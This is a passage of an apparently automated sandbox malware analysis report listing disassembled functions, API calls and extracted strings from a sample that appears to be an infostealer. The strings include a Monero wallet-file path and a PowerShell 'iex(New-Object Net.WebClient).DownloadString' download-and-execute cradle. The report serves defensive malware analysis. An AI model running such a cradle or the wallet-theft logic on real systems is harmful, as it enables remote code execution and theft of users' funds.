                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: 649832d1eddb15591cae2c17728e23d00952f2073327a39573ca8c02f14d2bec
                          • Instruction ID: 51f8910969ea2267d1e2b8b33dd75db610120b0ee645833cd89c0f721a18940b
                          • Opcode Fuzzy Hash: 649832d1eddb15591cae2c17728e23d00952f2073327a39573ca8c02f14d2bec
                          • Instruction Fuzzy Hash: B841E5B110079C5EDB218B658E84FFBBBF99F45754F1444A8FACA87182D2719A448F60
                          Function 00AF4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,0179DAE0), ref: 00AF47DB
                            • Part of subcall function 00AF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF4801
                          • lstrcat.KERNEL32(?,?), ref: 00AF4820
                          • lstrcat.KERNEL32(?,?), ref: 00AF4834
                          • lstrcat.KERNEL32(?,0178AEA0), ref: 00AF4847
                          • lstrcat.KERNEL32(?,?), ref: 00AF485B
                          • lstrcat.KERNEL32(?,0179D420), ref: 00AF486F
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AF8D90: GetFileAttributesA.KERNEL32(00000000,?,00AE1B54,?,?,00B0564C,?,?,00B00E1F), ref: 00AF8D9F
                            • Part of subcall function 00AF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00AF4580
                            • Part of subcall function 00AF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00AF4587
                            • Part of subcall function 00AF4570: wsprintfA.USER32 ref: 00AF45A6
                            • Part of subcall function 00AF4570: FindFirstFileA.KERNEL32(?,?), ref: 00AF45BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: b7108c79f815dfeea5694ab0713a32f86796fde722923c263abca4352b6d58dc
                          • Instruction ID: 764b017722b4d84759851113f1b18f89a6d1ed62ca80945af8211f20d776f1bb
                          • Opcode Fuzzy Hash: b7108c79f815dfeea5694ab0713a32f86796fde722923c263abca4352b6d58dc
                          • Instruction Fuzzy Hash: 46315FB690031CA7CB20FBB0DD85EFD737CAB58700F404589B31996181EEB4E7898BA5
                          Function 00AF2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00AF2D85
                          Strings
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00AF2D04
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00AF2CC4
                          • <, xrefs: 00AF2D39
                          • ')", xrefs: 00AF2CB3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: 179d53b01ef5beecb1f14776065fb1167830f2f4c95541c925131019be5e16df
                          • Instruction ID: 4105075256666b674124bdc2557004bc6fd2443c02a834c6f3724989a9eca7ca
                          • Opcode Fuzzy Hash: 179d53b01ef5beecb1f14776065fb1167830f2f4c95541c925131019be5e16df
                          • Instruction Fuzzy Hash: 7D41DEB1D1020C9ADB14FBE0C991BFDBB74AF20340F508169F60AA7195DFB46A4ACF91
                          Function 00AE9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00AE9F41
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 9b9e0458558b8ab9579ff912e80ef71e3a8524f0b9a38382b88f2b6a61ac1e93
                          • Instruction ID: 2ab0820b7b5c75b798c9c81443aaa41e2b0124142d5034c23e9a33b3de8f4a96
                          • Opcode Fuzzy Hash: 9b9e0458558b8ab9579ff912e80ef71e3a8524f0b9a38382b88f2b6a61ac1e93
                          • Instruction Fuzzy Hash: 8A613E71A1024CEBDB24EFA5CD96FED77B5AF54340F008018FA0A9B191EB706A05CB92
                          Function 00AF6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00AF696C
                          • sscanf.NTDLL ref: 00AF6999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00AF69B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00AF69C0
                          • ExitProcess.KERNEL32 ref: 00AF69DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: f2a58af8e11477251928d584124e83ca1fdeda3ed4b9b8446837fb1ea9b09107
                          • Instruction ID: 9a46adf3e5631411818fea2533f7d4c00ddcd121c24092d1ed4bdb88725a8b5c
                          • Opcode Fuzzy Hash: f2a58af8e11477251928d584124e83ca1fdeda3ed4b9b8446837fb1ea9b09107
                          • Instruction Fuzzy Hash: FB21B8B5D1420CABCB14EFE8D9459EEB7B5FF58300F04852AE506E3250EB745605CBA9
                          Function 00AF7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF7E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF7E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0178BB48,00000000,00020119,?), ref: 00AF7E5E
                          • RegQueryValueExA.ADVAPI32(?,0179D400,00000000,00000000,000000FF,000000FF), ref: 00AF7E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00AF7E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 959376e29fc2cdf10fcfe987c927061a5412eec043ffafe9c9ee1f48d7f2d0ba
                          • Instruction ID: 9e610ada25edef9c09ada3c607c72a062e5ad5112e687f4d88d3f8aa1f56d50d
                          • Opcode Fuzzy Hash: 959376e29fc2cdf10fcfe987c927061a5412eec043ffafe9c9ee1f48d7f2d0ba
                          • Instruction Fuzzy Hash: DB113AB1A44309ABD714DBD8DD4AFBFBBB8EB08B10F10415AF715E7280D77459018BA1
                          Function 00AF9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(0179D978,?,?,?,00AF140C,?,0179D978,00000000), ref: 00AF926C
                          • lstrcpyn.KERNEL32(00D2AB88,0179D978,0179D978,?,00AF140C,?,0179D978), ref: 00AF9290
                          • lstrlen.KERNEL32(?,?,00AF140C,?,0179D978), ref: 00AF92A7
                          • wsprintfA.USER32 ref: 00AF92C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 9e9a9cd1e68c2e5c645e1711b36fd253a9555324c52c38a4129fabb44aee856d
                          • Instruction ID: c48bf8e2f9089c46ef80335742a9e84e8a065b9d4d302403bd0e1d5ff575b07a
                          • Opcode Fuzzy Hash: 9e9a9cd1e68c2e5c645e1711b36fd253a9555324c52c38a4129fabb44aee856d
                          • Instruction Fuzzy Hash: CB01D675500208FFCB14DFECD988EAE7BB9EF58355F108548F9099B344C631AA41DBA6
                          Function 00AE12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AE12B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AE12BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00AE12D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AE12F5
                          • RegCloseKey.ADVAPI32(?), ref: 00AE12FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 8db1b4e777cd2f31143d2cbc87ee565d90ebf473f1d4957819f5faf7e21b78f2
                          • Instruction ID: 9532c90744ec6a1590bf2ad9833d6c477735b8112ba226f465d04fbfbbb4987f
                          • Opcode Fuzzy Hash: 8db1b4e777cd2f31143d2cbc87ee565d90ebf473f1d4957819f5faf7e21b78f2
                          • Instruction Fuzzy Hash: A801CDB9A40308BBDB14DFE4DC49FAEB7B8EB58701F108159FA05D7280D6759A018FA1
                          Function 00AF6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00AF6663
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00AF6726
                          • ExitProcess.KERNEL32 ref: 00AF6755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 4fc91a6d411fc5601bcc3c7ea2f733b84f762ce5ab46b39a03afb50f4597bfe8
                          • Instruction ID: 485442e69b40e1101b5a92b0fe99f8a3eaa102a7f7e60d951c5229c30ee893cb
                          • Opcode Fuzzy Hash: 4fc91a6d411fc5601bcc3c7ea2f733b84f762ce5ab46b39a03afb50f4597bfe8
                          • Instruction Fuzzy Hash: 30311EF1901218ABDB14EB94DD91BEE7778AF24300F404199F309A7191DFB46B49CFAA
                          Function 00AF87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B00E28,00000000,?), ref: 00AF882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF8836
                          • wsprintfA.USER32 ref: 00AF8850
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 5ffd2ea9a7a08b99b320760a1bb1f07733821182d2626e8a3b26dd71af6643a8
                          • Instruction ID: 470674b2cd5ca42cb197e528d0e9b205987102b60abc363ceb9d557f9d403ffe
                          • Opcode Fuzzy Hash: 5ffd2ea9a7a08b99b320760a1bb1f07733821182d2626e8a3b26dd71af6643a8
                          • Instruction Fuzzy Hash: 46211AB1A40308ABDB14DF98DD49FAEBBB8FB48701F104119F605E7380C779A9018BB1
                          Function 00AF8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00AF951E,00000000), ref: 00AF8D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF8D62
                          • wsprintfW.USER32 ref: 00AF8D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
